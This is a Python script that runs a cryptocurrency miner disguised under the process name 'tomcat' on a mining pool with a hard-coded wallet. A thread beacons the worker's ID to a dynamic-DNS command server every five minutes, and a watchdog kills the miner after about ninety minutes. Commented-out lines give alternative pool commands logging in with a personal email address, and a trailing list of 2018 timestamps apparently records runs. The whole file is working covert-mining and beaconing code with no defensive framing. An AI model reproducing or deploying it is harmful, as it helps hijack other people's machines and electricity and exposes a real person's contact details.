import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:15:04.403998
#2018-02-17 16:04:01.419702
#2018-02-17 17:53:07.274136
#2018-02-17 19:42:04.882821
#2018-02-17 21:31:07.455941
#2018-02-17 23:15:08.565381
#2018-02-18 01:02:06.468130
#2018-02-18 02:50:01.443650
#2018-02-18 04:40:02.867541
#2018-02-18 06:32:05.518174
#2018-02-18 08:20:01.327294
#2018-02-18 10:08:06.788858
#2018-02-18 11:54:05.129527
#2018-02-18 13:39:04.006884
#2018-02-18 15:29:04.897002
#2018-02-18 17:18:07.075658
#2018-02-18 19:07:03.254348
#2018-02-18 20:55:01.547242
#2018-02-18 22:42:08.402593
#2018-02-19 00:31:04.971173
#2018-02-19 02:16:05.737912
#2018-02-19 04:03:05.284323
#2018-02-19 05:48:05.708497
#2018-02-19 07:37:01.363633
#2018-02-19 09:27:02.148436
#2018-02-19 11:16:02.116381
#2018-02-19 13:04:01.554718
#2018-02-19 14:52:11.258881
#2018-02-19 16:41:06.236381
#2018-02-19 18:28:07.497069
#2018-02-19 20:14:01.672107
#2018-02-19 22:03:06.571860
#2018-02-19 23:49:02.254502
#2018-02-20 01:35:06.793562
#2018-02-20 03:23:05.227899
#2018-02-20 05:10:01.907446
#2018-02-20 06:53:01.594797
#2018-02-20 08:39:07.927784
#2018-02-20 10:23:06.187514
#2018-02-20 12:09:06.129268
#2018-02-20 13:56:01.816407
#2018-02-20 15:41:09.911410
#2018-02-20 17:26:09.099137
#2018-02-20 19:15:12.583154
#2018-02-20 21:04:06.001955
#2018-02-20 22:49:06.658378
#2018-02-21 00:31:06.668978
#2018-02-21 02:17:07.772246
#2018-02-21 04:05:07.787795
#2018-02-21 05:52:03.844682
#2018-02-21 07:40:03.906949
#2018-02-21 09:25:03.208108
#2018-02-21 11:14:04.732849
#2018-02-21 13:03:01.856143
#2018-02-21 14:50:04.165142
#2018-02-21 16:39:01.900193
#2018-02-21 18:29:09.747950
#2018-02-21 20:14:08.669748
#2018-02-21 22:02:08.858424
#2018-02-21 23:48:05.211586
#2018-02-22 01:38:03.925001
#2018-02-22 03:25:06.693528
#2018-02-22 05:12:07.886285
#2018-02-22 06:56:04.278862
#2018-02-22 08:45:01.743201
#2018-02-22 10:32:07.962955
#2018-02-22 12:19:06.206972
#2018-02-22 14:03:09.539671
#2018-02-22 15:50:14.596332
#2018-02-22 17:38:06.928487
#2018-02-22 19:25:07.255537
#2018-02-22 21:18:05.197937
#2018-02-22 23:04:06.342710
#2018-02-23 00:52:08.171733
#2018-02-23 02:39:03.713024
#2018-02-23 04:28:01.910083
#2018-02-23 06:13:06.459776
#2018-02-23 07:59:01.360790
#2018-02-23 10:08:03.976636
#2018-02-23 11:59:01.872881
#2018-02-23 13:47:12.041197
#2018-02-23 15:37:04.740451
#2018-02-23 17:25:08.845634
#2018-02-23 19:11:07.504128
#2018-02-23 20:57:05.294412
#2018-02-23 22:44:01.450386
#2018-02-24 00:30:01.492587
#2018-02-24 02:21:06.710101
#2018-02-24 04:10:09.774936
#2018-02-24 05:58:03.578969
#2018-02-24 07:45:07.027763
#2018-02-24 09:33:06.949609
#2018-02-24 11:27:06.034055
#2018-02-24 13:16:07.490615
#2018-02-24 15:07:05.078168
#2018-02-24 16:56:01.446248
#2018-02-24 18:43:06.296642
#2018-02-24 20:35:02.817859
#2018-02-24 22:38:04.439714
#2018-02-25 01:45:02.385823
#2018-02-25 05:27:04.913675
#2018-02-25 11:35:04.446695